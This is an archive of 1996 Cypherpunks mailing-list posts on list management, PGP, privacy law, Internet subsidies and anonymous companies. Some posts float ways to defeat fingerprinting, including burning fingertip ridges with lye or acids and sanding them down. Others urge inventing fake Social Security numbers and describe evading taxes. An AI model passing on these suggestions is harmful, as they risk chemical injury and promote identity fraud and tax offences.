>Since hackers and wannabes probably read INFOSEC publications with more 
>zeal than do INFOSEC practitioners, I'd say we're likely to be in for even 
>more of the "I don't want to be on this list" sorts of traffic.

the mailing list infrastructure of cyberspace is at an 
incredibly immature stage of development imho, and this is a
good example of its lack of refinement. there is wide open
room for improvement and a lot of demand as well imho.

one possible short-term solution is to do the following: have
the mailing list send a secret password to the subscription
address before starting the list. the person replies with the
secret password to confirm they wanted the subscription. it's
a tedious two-stage process, but in some cases it may be
appropriate.

as far as long-term solutions go, I'd like to see some serious
thought about the following problems:

1. how do people avoid getting mail from entities they don't want,
but at the same time get mail from entities they do. note this
problem is far larger than that of mere mailing lists.

2. how can good cyberspatial forums be constructed that are
bulletproof against pranks.

3. how can these forums be integrated with future software such
as Netscape to give a good interface to the user.


I think there is room for an enterprising cyberspace company to
work on these problems and make a lot of money for succeeding.
for example, imagine a system similar to Yahoo that catalogs the
massive amounts of email mailing lists out there. "been done"?
no, sorry, I don't think so. there is a list by DeSilva or someone
that is pretty good, but I think only scratches the surface of
public mailing lists. a yahoo-like indexing system merely for
"cyberspace mailing lists" I think might be a profitable endeavor
to pursue.

another neat thing would be to have a "mailing list manager" built
into software. instead of this ridiculous concept of people hand-typing
and sending commands to listservers (all of which have different 
syntaxes and behavior etc.) I would like to see a "mailing list standard". a
standard way that a mailing list operates (as far as dealing with
headers, errors, subscribing, unsubscribing, etc.). 

then I would like to see a gui interface that handles all the options. 
you just see a group somewhere and a button that you press to
"subscribe". the software would automatically separate your mailing
list traffic into separate folders. it would keep track of what 
lists you are on, and all you would have to do is look at that
list and hit an "unsubscribe" button corresponding to a group you
are currently in, whenever you wanted to.

I really think that the above capabilities are going to prove
very valuable in the future and are the logical next step in
"civilizing cyberspace" after the web and netscape have overtaken the 
planet.

if I get some positive feedback from this message that others are
interested, I might go to the trouble to write up some preliminary
ideas on a standard. it really bugs me that this area hasn't been
standardized by this point, nor does there seem to be any activity
by any groups towards doing so.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sig Porter" <sporter@electriciti.com>
Date: Wed, 15 May 1996 13:07:33 +0800
To: Black Unicorn <Senator_Leahy@leahy.senate.gov
Subject: Re: Senator Leahy's Public Key
Message-ID: <m0uJQY4-00061eC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sun, 5 May 1996 13:23:09 -0400 (EDT)
> From:          Black Unicorn <unicorn@schloss.li>
....
> I'll visit his office and ask if he wants he key signed this week.

So?
-------------------------------------
Sig Porter  sporter@electriciti.com 
finger for pgp key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay Haines" <jay_haines@connaught-usa.com>
Date: Wed, 15 May 1996 12:30:20 +0800
To: "Cypherpunk list" <cypherpunks@toad.com>
Subject: RSAREF for Mac?
Message-ID: <n1380042024.72602@flu.connaught-usa.com>
MIME-Version: 1.0
Content-Type: text/plain


                      Subject:                              Time:  1:24 PM
  OFFICE MEMO         RSAREF for Mac?                       Date:  5/14/96

It seems that I have seen this question asked before, but as I had no need for
the answer at that time, I trashed it. So, without further ado:

Can anyone point in the direction of RSAREF for the Macintosh? 

expectantly, (no, i'm not pregnant,)
Jay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 15 May 1996 13:29:25 +0800
To: trei@process.com
Subject: Re: [NOISE] Re: Notes from the SF Physical Cypherpunks meeting
In-Reply-To: <199605141322.GAA12489@toad.com>
Message-ID: <claAEhe00YUzIDEJ4C@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 14-May-96 [NOISE] Re: Notes from the
.. by "Peter Trei"@process.com 
>    My understanding is that Sweden's postion vis-a-vis the Internet has
> been particularly clueless, with international email technically a crime,
> and government officials who regard modems as criminal tools.

I have some info on current Swedish legislative proposals at
http://www.cs.cmu.edu/~declan/international/

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 15 May 1996 12:39:46 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <84A0994A02502C79@-SMF->
Message-ID: <85A0994A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


With regards to filling in your own card, what about using a disappearing 
ink?? Then your prints would disappear! You could even do your name, 
right infront of them, and it would disappear, leaving these anynonomous 
prints behind!!

Or you could make an inkpad that is damp with sodium hydroxide (lye) 
instead of ink.  That way, you could lightly roll your fingers in it, 
like it was ink, and then wait a minute, and wipe it off.  That way, the 
only skin being eaten away, would be the ridges of the fingerprints.  Do 
this enought times, and the rigdes will end up the same height as the 
valleys, and will then essentially be flat.

Just a thought, but I'd like to hear if anyone would think either ideas 
would work.

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 May 1996 14:29:55 +0800
To: cypherpunks@toad.com
Subject: Negative side-effect of the coderpunks split
In-Reply-To: <doug-9604141557.AA00094281@netman.eng.auburn.edu>
Message-ID: <Pine.SOL.3.91.960514135114.773T-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Ever since most of the hard crypto content moved to coderpunks, there have 
been a lot of totally non-crypto political postings that make my skin 
crawl. In general, the only thing that cypherpunks have in common is a 
belief that privacy is a good thing, strong cryptography is a good way 
to improve privacy, and that cryptography with _manadatory_ key escrow is 
not strong. Stuff on the CDA yes. Stuff on the CBA no. Use of crypto for
on-line tax filing yes. Generic Tax Evadance stuff not really.

I kinda miss the Perrygrams :)

-----
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 15 May 1996 12:23:56 +0800
To: cypherpunks@toad.com
Subject: Defeating fingerprints
Message-ID: <199605141903.OAA05327@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> With regards to filling in your own card, what about using a disappearing 
> ink?? Then your prints would disappear! You could even do your name, 
> right infront of them, and it would disappear, leaving these anynonomous 
> prints behind!!

While the ink does become transparent/translucent I am shure the FBI chem
lab won't have a problem finding traces of the chemical. This would make for
jim dandy evidence in court.

> Or you could make an inkpad that is damp with sodium hydroxide (lye) 
> instead of ink.  That way, you could lightly roll your fingers in it, 
> like it was ink, and then wait a minute, and wipe it off.  That way, the 
> only skin being eaten away, would be the ridges of the fingerprints.  Do 
> this enought times, and the rigdes will end up the same height as the 
> valleys, and will then essentially be flat.

Burglars and safecrackers sand the ridges off.


                                                         Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 15 May 1996 12:17:39 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <9605141836.AA01074@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


[Wildly off-topic...]

Michael Froomkin wrote:

...

>...And there's a lot more
>than skimpy outfits at issue, including a refusal to hire men for what are
>allegedly food service jobs (gender may only be a determination of
>employment if it is a bona fide occupational qualfiication, e.g.  policing
>the showers in the gym; gender is not a BFOQ for food service jobs.)

Being a "Hooters Girl" is not a typical "allegedly food service"
job. [Because it's an election-year] the EEOC dropped the case,
but not before Tom Hazlett did an *excellent* piece on it in
REASON. _Corporate Rakeovers_, Feb. 1996 p. 66






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 15 May 1996 14:40:45 +0800
To: clueless@c2.org
Subject: [NOISE] Re: Notes from the SF P
In-Reply-To: <81A0994A02502C79@-SMF->
Message-ID: <54A3994A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain



> From: minow@apple.com (Martin Minow)
> Subject: Re: Notes from the SF Physical Cypherpunks meeting
[...]
> The Swedish government has a rather strong tradition of protection
> of individual privacy (encrypting COM e-mail is one example).
[...]
> Martin Minow
> minow@apple.com

    Huh? 'a rather strong tradition of protection of individual privacy'? 
In 
Sweden, for many years  you could (and for all I know, still) go to a 
public
records office and look up all kinds of personal data on anyone, without
restriction - you could, for example, find out your co-workers exact 
salaries if you were curious.

   My understanding is that Sweden's postion vis-a-vis the Internet has
been particularly clueless, with international email technically a crime,
and government officials who regard modems as criminal tools.

   I hope things have improved.

Peter Trei (former resident alien in Sweden)
ptrei@acm.org   

   
-
Send "help" to majordomo@c2.org for information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 15 May 1996 13:26:17 +0800
To: clueless@c2.org
Subject: Re: TO ALL MEMBERS
In-Reply-To: <FD3B7641027A1B76@-SMF->
Message-ID: <57A3994A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605132111.QAA00205@silver.niia.net>,
Mathew Ellman <mellman@niia.net> wrote:
> TO ALL MEMBERS, 
>         IM TIRED OF ALL THIS SHIT I HAVE UNSUBSCRIBED MANY TIMES AND 
ALL I
> GET IS SOME STUPID ASS REPLY ABOUT CLOSED LIST OR ADDRESS NOT MATCHING 
AND I
> GET NO REPLY SO UNLESS YOU ALL WANT TO GET A BUNCH OF UN WANTED 
BULLSHIT
> (LIKE THE SHIT IM GETING FROM YOU ) I SUGEST SOMEONE FIND A WAY TO GET 
ME
> THE FUCK OFF THIS LIST . I HAVE GOT IN TOUCH WITH THE PESON THE REPLY 
TELL
> ME TO AND NO REPLY. IM TIRED OF ALL THIS SHIT. 
> 
> 

To: majordomo@c2.org
Subject: subscribe clueless mellman@niaa.net

subscribe clueless mellman@niaa.net

- -- 
Alan Bostick               | "The thing is, I've got rhythm but I don't 
have
mailto:abostick@netcom.com | music, so I guess I could ask for a few more 

news:alt.grelb             | things." (overheard)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMZfKfuVevBgtmhnpAQGHgQMAjE9RlL3Ivsvew2tpuAHUzbWwXRA76gBX
+o2ShOZFYJcxOb0Hw4nimCV+avuulztxJcPecAFimQ12qUOmLTs654I+Iy8tIAYm
uLEtUbs66aghUMHrb01fvclbn2bgX2Hq
=KMy4
-----END PGP SIGNATURE-----
-
Send "help" to majordomo@c2.org for information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@nyc.pipeline.com (John Young)
Date: Wed, 15 May 1996 09:53:01 +0800
To: cypherpunks@toad.com
Subject: FAC_ial
Message-ID: <199605141457.OAA26059@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-14-96. FiTi: 
 
   Reports on "Photobook," a "visual intelligence" comp.sys  
   for facial recognition designed by Alex Pentland at MIT's  
   Media Lab to "identify people who use multiple  
   identifications to commit fraud." 
 
   BT, the US Army, Kodak and Sensormatic are nibbling and the 
   White House is ogling it to "combat terrorism." Also: 
 
      The program could help find missing children, verify 
      indentification for electronic purchases and track down 
      on-line pornographers. Although the Big Brother aspect 
      may be troubling to some, to others it will provide 
      comforting security. 
 
   FAC_ial 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 15 May 1996 15:53:50 +0800
To: cypherpunks list <cypherpunks@toad.com>
Subject: Re: Transitive trust and MLM
In-Reply-To: <Pine.GUL.3.93.960513225226.19375C-100000@Networking.Stanford.EDU>
Message-ID: <199605142031.NAA19800@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> That sounds sincere coming from someone who calls himself "eli+" :-)

Nah, that would be "eli++".  Or better, "++eli".  Actually, this keeps
CMU's overly-clever mail system from delivering my mail to an "Edward
Lawrence Immelmann" -- it prefers initials to login names.

> > It's true that you don't need to talk to everybody.  The problem is
> > that I might want to talk to people whom I don't know personally, but
> > know by reputation, or by function ("DEA Rat Hotline" -- well, maybe
> > not).
> 
> Yes, that is a problem. That problem is one of the reasons that public key
> encryption was invented, actually.

But PK doesn't make the key distribution problem go away.  This thread
has been about a particular approach to PK key distribution, the web
of trust, and how to model its behavior.

> The way to know whether an untrusted key really belongs to someone is to
> wait for the response. Which means don't spill all the beans at once.

Generally insufficient.  If someone is going to go to the trouble of a
key-substitution attack, they're going to take the time to compose a
plausible response.  This approach is useful if the intended recipient
*is* well-known to you.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 15 May 1996 17:00:21 +0800
To: jamesd@echeque.com
Subject: Re:  Why does the state still stand:
Message-ID: <199605142335.QAA13553@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes a very interesting essay but I want to clarify one
aspect.  Let me quote just the summary:

> So guys, that is the plan:  We destroy the state through higher mathematics.
> We do this by replacing the current institutional mechanisms of corporations
> with cryptographic mechanisms.  This will give more people the opportunity
> to evade and resist taxes.

I think the intention then is to create "fully anonymous" companies.
These would be organizations whose principals and employees are known
only by pseudonyms, even to each other.  Their only contact is
electronic, via an anonymous network.  And the employees are paid in
anonymous ecash, which they don't pay taxes on since it is unreported
income.

These companies produce products or services which they offer for sale
across the net.  They accept payment in ecash, either from end users or
from other companies.

Such companies would be illegal, with everyone involved subject to
criminal penalties for tax evasion (and no doubt a myriad of other
violations).  But because the anonymity is protected cryptographically,
the government is helpless to learn the true identities of anyone
involved.  The companies continue to successfully sell their products
and services, advertising and recruiting openly from anonymous sources,
and there is nothing the government can do about it.

This is, I think, the model we have been talking about for several
years on this list.  There are obvious and non-obvious problems which
many people have brought up over the years.  It is still not clear to
me that it can really work in this form.  Still it will be interesting
to see when someone actually tries to do this, to see how it works.

James mentioned the issue of groupware to allow these people to
coordinate their efforts.  That is an interesting aspect that we haven't
considered much.  One trend which may be relevant is the increase in
telecommuting.  Once people are accustomed to working mostly from home,
interacting with co-workers and management by email, they would be good
candidates for recruitment by the anonymous firm.

It might be interesting to make a list of all the problems people can
think of why this idea won't work, paired with proposed solutions and
workarounds - sort of a mini FAQ for this important (some might say
ultimate) cypherpunk model.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 15 May 1996 15:34:01 +0800
To: unicorn@schloss.li
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4PAYQGM928Y5E3V@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 14-MAY-1996 12:45:16.88

>It is one of the great advantages of the United States that no
>standardized procedure for person identification exists.  Seals and
>certificates vary from jurisdiction to jurisdiction.  Cross the border to
>a state and a hospital birth annoucement is enough for a drivers license,
>cross again and 4 pieces and a note from mom isn't enough.

	Are there any good reference works on how such requirements vary
between states? I know Loompanics has some works on the subject of identity,
but I don't know how reliable they are.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 15 May 1996 13:49:43 +0800
To: unicorn@schloss.li
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4PB3QYPL88Y5E3V@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 14-MAY-1996 13:05:37.99

>On Mon, 13 May 1996, Paul S. Penrod wrote:

>> Pineapple juice and other weak acidic subtances ruin the ridges on the 
>> finger tips causing them to smear or not show at all. Unfortunately, this 
>> takes a period of time and constant handling of such items.

>This is interesting.  I suspect that you'd have to have major damage to
>the ridges however.

	One idea I've had is dermabrasion of the fingertips. There could be
some problems with this, however, in that dermabrasion works best on areas
well-supplied with blood vessels and various other healing-promoting
characteristics; thus, it is customarily used only on the face. It would be
interesting to see if angiogenesis (blood vessel growing) and other growth
factors could be used in order to have dermabrasion on other parts of the
body without scarring (the normal consequence of using it in other areas);
this would have cosmetic as well as identity-related applications. I haven't
found any research on this subject on Medline.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 15 May 1996 16:19:49 +0800
To: cypherpunks@toad.com
Subject: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <v02140b03adbedfdeadf3@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> At 3:57 PM 5/14/96, Doug Hughes wrote:
>
> >I wouldn't normally respond to such an offtopic post, but this post is
> >so egregious I couldn't let it pass. Who says they make a choice to live
> >in rural areas? Do they also choose not to have enough money to pay
> >for shoes? So, because they live in a poor district they are not entitled
>
> Your shoe example is apt. Fact is, we *don't* pay for people's shoes. Why
> should we pay for their Net access when we don't pay for their shoes, or
> their food, or their electricity, or their phone bill, or their cable t.v.
> subscription? Many of these things seem like higher priorities than being
> able to "surf the Net."

Well, this sort of subsidization is in the grand tradition of the Rural
Electrification Act of the new deal era and it seems to have worked out
pretty well.  The point being that we, as a social group, benefit when
everyone has access to certain pieces of the general infrastructure:
if everyone has electricity then appliance manufacturers can sell to
everyone, etc.  This is particularly true when it comes to services like
electricity, phones, etc. where it is much easier to wire up the cities
than areas with a lower population density.

BTW, while there may have been a decent argument against the electrification
act, I think that you are paddling upstream when it comes to net connections.
The value of your net connection (or any connection to the net) _increases_
according to the number of people who are connected to the network.  Unlike
all of the other rural subsidies you pay for as an urban dweller (with the
possible exception of the phone subsidy), this is one which has direct benefit
to you.

Oh yeah, and you are already subsidizing their phone bill (at least the
increased cost of running a line out to them and maintaining that line), and
their electricity bill, and satellite TV took care of any need to run cable
TV lines out there or else you would also be subsidizing their cable TV by
now.  So what was your point?

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Steel Wolf <nneel@ionet.net>
Date: Wed, 15 May 1996 15:14:15 +0800
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <199605142234.RAA02330@ion3.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be added to the Cypherpunk mailing list, please.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 15 May 1996 14:55:24 +0800
To: Sig Porter <sporter@electriciti.com>
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <m0uJQY4-00061eC@powergrid.electriciti.com>
Message-ID: <Pine.SUN.3.93.960514175820.15768A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Sig Porter wrote:

> > Date:          Sun, 5 May 1996 13:23:09 -0400 (EDT)
> > From:          Black Unicorn <unicorn@schloss.li>
> ....
> > I'll visit his office and ask if he wants he key signed this week.
> 
> So?

I've been tied up so far.  I'll post the list with my results.

> -------------------------------------
> Sig Porter  sporter@electriciti.com 
> finger for pgp key
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 15 May 1996 16:27:47 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
In-Reply-To: <9605141430.AA20216@rpcp.mit.edu>
Message-ID: <Pine.SUN.3.91.960514175706.8693B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Joseph M. Reagle Jr. wrote:

> [Regarding ACLU v. Reno]
> 
>         Perhaps someone with a better legal understanding of court cases
> could help me out. I understood from a law course I took that appeals could
> only be filed with respect to process rather than result. One cannot appeal

False.

> a decision, rather one has to appeal the manner in which it was reached (if
> witnesses were biased, important evidence was suppressed, etc.) I was rather
> surprised by this, but obviously this doesn't prevent people from appealing
> willy-nilly because they just fabricate some reason why the process was
> corrupted.

I have no idea how you got this idea.  It is not so.  It sounds like a 
highly garbled version of the rule for the appeal from a **jury 
verdict**.  In such cases you can only appeal the result absent a claim 
of procedural or substantive legal error  if it is so obviously and horribly 
wrong that no rational jury could possibly have come to that conclusion 
on the evidence.  In a jury trial therefore the usual method of appeal is 
to find either an error in the procedure or an error of law in the jury 
instruction, or in the rare case to challenge the law itself as 
unconstitutional.

None of this, however, applies to the CDA case, which is a direct 
challenge to the Constitutional validity of the law, and which is being 
tried before a special three-judge panel of the district court, sitting 
without a jury, pursuant to the special procedure set out in the bill 
itself.  This procedure is used with some regularity for caseds where 
congress realizes that the validity of the law is likely to be questioned.

> 
>         However, in a venue such as this, what basis can one appeal on? On
> the ACLU side I can actually see an appeal with respect to the
> constitutionality (but I'm not quite sure what) and on the Reno side I don't
> see what they could appeal. Was some evidence poorly presented? It isn't
> like there are any witnesses to lead.

You can appeal directly on the merits.  And you do so.  The higher court 
decides all questions of law de novo (ie pays no deference ot tyhe 
decision of the court below beyond whatever persuasive power it may 
have), but must accept the factual record as presented ("found") by the 
court below.  Thus the importance of the trial testimony at this stage.

[I am away from Miami from May 8 to May 28.  I will have no Internet 
connection from May 22 to May 29; intermittent connections before then.]
 
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 15 May 1996 15:48:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <adbe18d00702100450ef@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960514180127.15768B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Timothy C. May wrote:

> At 3:22 PM 5/14/96, Matthew Williams wrote:
> >> Date sent:      Mon, 13 May 1996 23:19:12 -0400 (EDT)
> >> From:           Black Unicorn <unicorn@schloss.li>
> >
> ><...>
> >
> >>
> >> I compare it to the ease with which one submits a fake social security
> >> number rather than simply refuse to submit one at all.  A fake one wont
> >> raise any eyebrows, refusal will.
> >
> >Although knowingly providing a fake social security number when one
> >has any expectation of gain is, I believe, a felony.
> >
> >42 USC. sec. 408.

Note the key provisons, for gain, and when submitted to those entitled to
the number legally.

> 
> Indeed.
> 
> Plus, should one "just make a number up," odds are good that it "won't
> compute," that is, that it will either collide with an existing number (and
> identity, and reported income) or that it will fail the checksum/allocation
> tests.

This is obvious.  Some thought has to go into generation, and you
correctly point out the key place to look here:

> (That is, not all xxx-yy-zzzz numbers are valid SS numbers. See Chris
> Hibbert's "Structure of Social Security Numbers" FAQ, at
> http://snyside.sunnyside.com/cpsr/privacy/ssn/oldSSN/ssn.structure.html
> for details.)
> 
> The IRS imposes penalties for faking SS numbers. (Not to mention the
> punishment meted out by the Sturmgruppenfuhrers of the SS!)

We weren't discussing the IRS specifically, but I will address them.
Consider the context I used the social security number example in, that
being something which was used for that which it was not originally
intended and in which most of the entities who do use them are not legally
entitled to demand them.

Social security numbers are used so frequently as identification because
each person is only supposed to have one, and no two people are to have
the same one.

The fact is that one can quite easily survive without ever even having a
social security number.  A friend of mine was a trust fund kid and never
held a job a day in his life.  He would file every year and leave the
taxpayer identification number blank.  He paid all his taxes on trust
income and personal investment income etc., but never bothered to fill in
the number.  The IRS took his checks quite happily and continues to send
him a bit of paper every year complaining that he hasn't given them one.
I believe it's been running like that for 20 years now.

Another individual I knew sent a completely made up number on his first
tax return and just stuck by it for life.  Every year he'd get two 
notices in the mail.

I gave him a buzz and he faxed me copies which I now reproduce for you.

Notice 1:

Dear Taxpayer:

Thank you for the information you gave us on June 22, 1975 (The
letter is dated 1992) about your name and social security number.
However, the information still doesn't agree with that give us by the
Social Security Administration.

The Internal Revenue Service can't correct this problem for you.  Only the
Social Security Administration can issue social security numbers or
correct records relating to them.

Please contact the nearest Social Security Administration office.  Be sure
to take proof of your age and identity.  If you are foreign-born, you also
must give proof of U.S. citizenship or alien status.  If you are 18 years
of age or older and have never had a social security number, you must fill
out the application in person.

According to the law, any person who files a return must include an
identifying number on it.  A social security number is used for this
purpose.

If you have questions about this letter, please write us at the above
address.  If you prefer, you may call the IRS telephone number listed in
your local directory.  An employee there may be able to help you, but this
office is most familiar with your case.

Notice 2:

Dear Taxpayer:

Our records indicate the Social Security number xxx-xx-xxxx (used in
filing your return) has also been used by another taxpayer.  Please verify
your social security number by sending a copy of your Social Security
Card.

If you do not have a Social Security card [go get one].

Thank you for your patience and cooperation.


According to him he now has a total of 24 such notices, all nearly exactly
alike.  Funny, he keeps getting refunds though.


> A simple transposition of two digits may not get you zapped, but a
> large-scale transposition or outright falsification will. If and when they
> catch up with you.

Given the above, I'm not too concerned for my friends.

> I'm all for avoiding taxes, but this is not a cost-effective way to do it.

Looks cost effective to me.  Costs about what it does to feed you long
enough to throw the junk mail away.

Again, this is all beyond the original point.  Even conceeding for a
moment that the IRS and your bank may be entitled to your social security
number 'by law.'  Your school, your library, your favorate shop, your
local radio shack are not.  If they ask for it, which they often do, make
something up.  Don't be fooled by morons who tell you about the 50
million different people who you are required to surrender your SSN to on
demand either.  IRS and those entities which must report to the IRS are
about the only universally recognized groups which can exert any authority
in demanding your SSN.  Some states have provisions requiring it for
driver's licenses, others don't care.

The question is not who is entitled to it now, but who is going to get it
later and what can you do about it?

> --Tim

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen Ethridge)
Date: Wed, 15 May 1996 15:25:44 +0800
To: cypherpunks@toad.com
Subject: Re: PRZ /PGP
In-Reply-To: <199605140557.WAA02396@netcom22.netcom.com>
Message-ID: <19960514182933135274@central28.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir wrote:
> 
> . . . 
> 
> 4. PRZ has a bad track record as far as meeting deadlines.
> it is not how his brain works. but this is how business
> works. with public domain software, no one rants at you
> if you don't come out with something when you say you will,
> or even if you don't even say when you are going to be
> ready. but when money is involved, this is the very
> first thing you have to be accountable for, no excuses.

I don't mean to be too rude, but what planet do you live on?

Freeware authors are regularly criticized for delays, at least
on the Mac newsgroups.  And nearly everybody in software development
misses deadlines.  Where I've worked, us low level grunts (the guys and
gals with no rights, 'cause we signed them away in our contracts) make
our plans based on the assumption that the schedule will slip.
Management always manages to meet the schedule by changing plans at the
last minute - lengthening the deadline or removing committed features
that didn't make it.  If the software business had to meet deadlines to
survive computers would have ceased to exist several years ago.

Would it be unfair of me to assume that the rest of your points
regarding PRZ are just as specious?


-- 
if not me, then who?
mailto:ethridge@onramp.net
http://rampages.onramp.net/~ethridge/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 17:33:43 +0800
To: cypherpunks@toad.com
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <adbe745001021004b353@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:27 AM GMT 5/15/96, Jim McCoy wrote:

>BTW, while there may have been a decent argument against the electrification
>act, I think that you are paddling upstream when it comes to net connections.
>The value of your net connection (or any connection to the net) _increases_
>according to the number of people who are connected to the network.  Unlike

Au contraire! Speaking for myself, the value of _my_ net connection has
been going _down_ these past few years as more yahoos (TM of The Yahoo
Corporation) got connected and as congestion clogged the networks. So, on
this basis alone I am opposed to the "Rural Datafication" public works
project!

But seriously, Internet connections are already quite cheap. We've had this
debate a couple of times before here on Cypherpunks, and each time many of
us remain unconvinced that something like Net connections, which are so
well-handled by private enterprise and which depend so heavily on
technological innovation, are best handled by a socialized effort. There
are deep reasons why such government-led programs tend to freeze
progress...this is a longstanding debate topic in many forums, so I won't
argue this point right now.

...
>Oh yeah, and you are already subsidizing their phone bill (at least the
>increased cost of running a line out to them and maintaining that line), and
>their electricity bill, and satellite TV took care of any need to run cable
>TV lines out there or else you would also be subsidizing their cable TV by
>now.  So what was your point?

In point of fact, whether or not these things (electricity, phones) *are*
in fact being subsidized by urban dwellers (and there is some doubt that
this is the case, as it's frequently _much_ cheaper to string electrical
and phone lines in rural areas than in congested urban areas), this is no
reason to socialize Internet connections.

(And my local ISP is certainly not being taxed to pay for lines in Mendota
and East Gittyup, and I won't vote for any scheme which taxes _me_ to
subsidize those locales.)

Socializing Net connections would likely have various bad side effects,
such as freezing the state of development of certain services. (And
socializing access also plays into the hands of those who seek "democratic
control" of content, always a bad thing.)

By not socializing the deployment of Net connections, the eventual (and
ever-evolving) solutions can be cleaner and better than if the deployment
is done by government action, or with government complicity. Look at cable
t.v. for an example of how local community government sought "universal
